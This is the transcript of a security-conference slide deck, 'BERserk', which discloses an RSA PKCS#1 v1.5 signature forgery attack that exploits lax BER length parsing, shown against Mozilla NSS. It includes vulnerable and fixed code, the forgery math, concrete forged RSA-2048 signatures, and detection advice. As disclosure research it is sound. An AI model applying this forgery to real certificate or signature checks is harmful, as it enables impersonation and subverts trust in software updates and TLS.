How we scaled to 80K users by doing nothing!.pdf
 
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 

BERserk: New RSA Signature Forgery Attack

  • 1. BERserk: New RSA Signature Forgery Attack Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alex Matrosov, Mikhail Gorobets ekoparty10
  • 2. 2 Bleichenbacher’sPKCS#1 v1.5 Vulnerability defPKCS1v15_verify(hash,sig,pubkey): # decrypt EM from signature using public key EM =pubkey.encrypt(sig,0)[0] .. # check PS padding bytes 0xFF while((i<RSA_MODULUS_LEN)and(ord(EM[i])==0xFF)):i+=1 .. i+=1 ifi<11: returnSIGNATURE_VERIFICATION_FAILED T =EM[i:] T_size=len(T) (status,hash_from_EM,DI_size)=RSA_BER_Parse_DigestInfo(T,T_size) ifPADDING_OK !=status:returnSIGNATURE_VERIFICATION_FAILED # Verifying message digest if(hash !=hash_from_EM):returnSIGNATURE_VERIFICATION_FAILED returnSIGNATURE_VERIFICATION_PASSED
  • 3. 3 Fix (Well.. one of) (status,hash_from_EM,DI_size)=RSA_BER_Parse_DigestInfo(T,T_size) ifPADDING_OK !=status: returnSIGNATURE_VERIFICATION_FAILED HASH_LEN =len(hash) if(T_size!=(DI_size+HASH_LEN)): returnSIGNATURE_VERIFICATION_FAILED # Verifying message digest if(hash !=hash_from_EM): returnSIGNATURE_VERIFICATION_FAILED returnSIGNATURE_VERIFICATION_PASSED Make sure there’s no extra data left after the DigestInfo| Hash
  • 4. 4 Wait! Parsing DigestInfo!? Exactly why do you need to parse 19 (15, 18)-byte long string as ASN.1?? 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 RSA_BER_Parse_DigestInfo(T,T_size)
  • 5. 5 BER/DER Encoding of ASN.1 Lengths Identifier/Tag octets Length octets Contents octets [End-of-contents octets] BER Structure 1 0 0 0 0 0 0 Length Field Short or Long Length Short: Length of ASN.1 element Long: How many following octets describe the length of ASN.1 element (≤ 127) 1 Reference:ITU-T X.690 “Information technology -ASN.1 encoding rules: Specification of BER, CER and DER”
  • 6. 6 •DER is BER with additional restrictions! •DER: The definite form of length encoding shall be used, encoded in the minimum number of octets. •Both examples below describe ASN.1 lengths of 9bytes: BER vsDER Valid BER, Invalid DER Valid BER, Valid DER 1 0 0 0 0 0 0 1 0 0 0 1 0 0 1 0 0 0 0 0 1 0 0 1
  • 7. 7 Correct ASN.1 DigestInfo(SHA-256) 3031300d060960864801650304020105000420XXXXXXXXXXXXXXXXXXXX Tag Length 30(SEQUENCE)31 Tag Length 30(SEQUENCE)0d Tag Length 06(OID)09 OID 608648016503040201 Tag Length 05(NULL)00 Tag Length 04(OCTET STRING)20 octet string (SHA-256hash) XXXXXXXXXXXXXXXXXXXX
  • 8. 8 •Some crypto implementations would [attempt to] parse DigestInfoASN.1 sequence as BER allowing longlengths of ASN.1 elements •Vulnerablecrypto implementations would skip some or all bytes of the lengthallowing up to 127 bytes of extra data •The extra data can be used to find such signature without knowing private key that would pass validation Vulnerable Implementation Extra Data (127 bytes) 1 1 1 1 1 1 1 1 00 00 00 09 XX XX …
  • 9. 9 Malformed ASN.1 DigestInfo 3031300d060960864801650304020105c3..garbage ..04ff..garbage .. XXXXXXXXXXXXXXXXXXXX Tag Length (long form) 30(SEQUENCE)32 Tag Length (long form) 30(SEQUENCE)0d Tag Length 06(OID)05 OID 608648016503040201 Tag Length (long form) 05(NULL)c3(80|43)..garbage .. Tag Length 04(OCTET STRING)ff(80|7f)..garbage .. octet string (SHA-256hash) XXXXXXXXXXXXXXXXXXXX
  • 10. 10 Adding Extra Data in DigestInfo •By shortening the padding and inserting long lengths adversary can add extra data in DigestInfoASN.1 sequence “ .. “ Describes extra “Garbage” data Correct PKCS#1 v1.5 with DER DigestInfo Bad PKCS#1 v1.5: extra data in BER DigestInfo
  • 11. 11 •Forged Encoded Message (EM’) = Prefix + Middle + Suffix •Middle part includes fixed octets surrounded by extra “garbage” data –Length field(s) represent size of the new added data •Forged Signature S’is such that EM’=(S’) 3 •S’is represented as (h+m+l)such that EM’=(h+m+l) 3 •To find S’adversary needs to find such high (h), middle (m) and low (l) parts of the signature Forging a Signature
  • 12. 12 Calculating the Encoded Message Prefix Middle Suffix
  • 13. 13 •High, middle and low parts of the signature can be calculated independently to satisfyPrefix + Middle + Suffix = (h+ m+ l) 3 •Finding fixed octets in the middle part: 1.If fixed octets are adjacent to Prefix or Suffix parts, mcan be solved as part of calculating Prefix or Suffix 2.If number of fixed octets is small, mcan be found by exhaustive search (by incrementing bytes of mabove l) 3.mcan be found by solving elements of cube of sum of all three parts of the signature which affect the Middle part of the cube Calculating the Encoded Message (Cont’d)
  • 14. 14 Forged Signature (S’) 0000000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000001000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000002000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000003000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000004000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000005000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000006000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000007000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000008000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000009000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000a000 00 00 00 00 00 00 00 00 00 00 32 cbfd4a 7a 000000b0dc 79 05 58 3d 76 75 20 f5 16 40 75 91 76 d3 78 000000c026 f2 ef63 b4 b400 00 00 00 00 00 00 00 00 00 000000d000 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 7a 000000e0fa9a e7 78 68 89 39 47 83 14 5e 11 91 a9 a4 ac 000000f0bd7b fccb4d a0 7e 9f fc60 ad f2 4a c6 a1 cd
  • 15. 15 Forged Encoded Message (EM’) 0000000000 01 ff ffffffffffffff00 30 31 30 0d 06 0000001009 60 86 48 01 65 03 04 02 01 05c368 9b 67 e3 000000206c 25 a4 a2 f3 23 2d 63 cfaf1a 19 f0 d4 a8 78 00000030b9 bf b9 12 fd1c 00 95 74 f1 1f ed69 23 14 46 00000040f6 c2 aab2 21 54 7e ce2f 18 8d 5f 45 bb d6cd 00000050ad 25 06 50 98 68 11 b9 2a a1 0b b8 ca 7d 59 04 00000060ff4f da00 db 7f 2a c3 39 a0 ff ca baca 6f d8 00000070a2 19 3f 6b 42 07 9d 11 58 fc59 7d 51 d7 08 98 0000008042 5a f8 92 16 ee07 8b 5b 9a 6d c5 f8 00 80 d5 00000090b1 a3 47 56 b2 ddc6 d6 5c 13 98 4d bf 03 ad b0 000000a032 f8 8b 4d 5b 40 b7 ef8f fc4d 6b e3 e1 bb 1f 000000b058 a8 a3 41 55 22 00 84 4c b0 eb26 9f 64 a6 28 000000c04b a9 a5 62 a5 6a aeef00 f3 a9 d2 3d 6b f8 83 000000d02b e1 86 55 22 55 16 f4 3d 88 7c 74 b5 dfa4 b2 000000e048 ac e9 b7 bc30 cb37 33 84 19 f7 71 6d 4e 9f 000000f050 aa0a d2 a4 25 bcf3 8c 2a 11 66 9f 85 cfd5
  • 16. 16 A Case of Mozilla NSS The issue in Mozilla NSS library was independently discovered and reported by Antoine Delignat-Lavaud (INRIA Paris, PROSECCO)
  • 17. 17 staticSECStatusDecodeSequence(void*dest, … do { … rv=DecodeItem(dest,sequenceEntry,&sequence,arena,PR_TRUE); … }while((SECSuccess==rv)&& (sequenceEntry->kind && sequenceEntry->kind !=SEC_ASN1_SKIP_REST)); /* we should have consumed all the bytes in the sequence by now unless the caller doesn't care about the rest of the sequence */ if(SECSuccess==rv&&sequence.len&& … rv=SECFailure; } returnrv; } ASN.1 Decode in NSS Verifies no extra data left after decoding ASN.1 sequence Mozilla NSS honestly & completely decodes DigestInfoas ASN.1 sequence according to sgn_DigestInfoTemplatetemplate
  • 18. 18 How Many Bytes Can BER Length Have? staticunsignedchar*definite_length_decoder(constunsignedchar*buf, constunsignedintlength, unsignedint*data_length, PRBoolincludeTag) { unsignedintdata_len; .. data_len=buf[used_length++]; if(data_len&0x80) { intlen_count=data_len&0x7f; data_len=0; while(len_count-->0) { .. data_len=(data_len<<8)|buf[used_length++]; } } .. *data_length=data_len; return((unsignedchar*)buf+(includeTag?0:used_length)); } len_countcan be up to 127 data_lenis unsigned integer What about other 123 bytes?
  • 19. 19 Malformed ASN.1 DigestInfo(SHA-1) 30db..garbage ..000000 a030 ff..garbage ..0000000906052b0e03021a05000414XXXXXXXXXXX Tag Length (long form) 30(SEQUENCE)db(80|5b)..garbage ..000000a0 Tag Length (long form) 30(SEQUENCE)ff(80|7f)..garbage ..00000009 Tag Length 06(OID)05 OID 2b0e03021a Tag Length 05(NULL)00 Tag Length 04(OCTET STRING)14 octet string (the SHA1 hash) XXXXXXXXXXX
  • 20. 20 6 bytes in the middle of EM’ are 000000EL30LLmust have up to 127 bytes of garbage on both sides which defines a rangewhere these 6 bytes can be placed EM’=(S’)3 = (h+m+l)3= (h+l)3+ 3(h+l)2 m + 3(h+l)m2+ m3 Only (h+l)3and 3(h+l)m2affect upper 6 bytes of the range m is found from these terms Forging RSA-2048 in Mozilla NSS 00010030DB4A92154840980EF454EE2431A72B632170288000000000000000000000000000000000000000000000000014F278C9885FD01CA0329882DE2961783078704C19385293E42956ED1E32AD0EEDCBCE0A74443AF5E8123A07000000A030FF3B8C0DC54EE667655405C4B357D467FCD68517EA337E6FC70F76656068BB6CD5E41F24048F238132B3C681AAF6375A4506954EFB62EF7124B2FE365B497EA84C8E4AA137CA3B39DB693D0CCDDD2E9ACD6EF240D3E751BD77D8BC5F2C4384235D7EC85F7B5DB7F8A48AF2EE6ED49F1B89E264C3D928C3E387D974E00000000906052B0E03021A050004143C03741AFCA732172F45829A0FD8D14B480CA4C1
  • 21. 21 Forged RSA-2048 / SHA-1 Signature 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002853D660D0AE8E20000000000000000000000000000000000000000000000000000000000000000000000000000001195F4F8677641705A29EBDB3067E5F212ABFF010C999CBAB522DA0BCB588C5E93DD2B31F7C41 00010030DB4A92154840980EF454EE2431A72B632170288000000000000000000000000000000000000000000000000014F278C9885FD01CA0329882DE2961783078704C19385293E42956ED1E32AD0EEDCBCE0A74443AF5E8123A07000000A030FF3B8C0DC54EE667655405C4B357D467FCD68517EA337E6FC70F76656068BB6CD5E41F24048F238132B3C681AAF6375A4506954EFB62EF7124B2FE365B497EA84C8E4AA137CA3B39DB693D0CCDDD2E9ACD6EF240D3E751BD77D8BC5F2C4384235D7EC85F7B5DB7F8A48AF2EE6ED49F1B89E264C3D928C3E387D974E00000000906052B0E03021A050004143C03741AFCA732172F45829A0FD8D14B480CA4C1 Forged signature (S’) Decrypted signature (S’)3
  • 22. 22 •“BERSerk” is not one bug but rather a class of bugs when parsing BER lengths. Each implementation is different •Parsing DigestInfoas ASN.1 is a bad idea. There are just a few short DigestInfosequences that an implementation needs to compare with •Detecting forged PKCS#1 v1.5 signatures: –Does the signature have a bunch of zeros? Suspicious! –More precise, does (signature)3< RSA modulusfor any certificate in the chain? Forged certificate! Conclusions / Recommendations
  • 23. 23 •Part 1: RSA signature forgery attack due to incorrect parsing of ASN.1 encoded DigestInfoin PKCS#1 v1.5 •Part 2: Certificate Forgery in Mozilla NSS References
  • 24. 24 Thank You! Many thanks to Francisca Moreno and Charles McFarland for help with the presentation!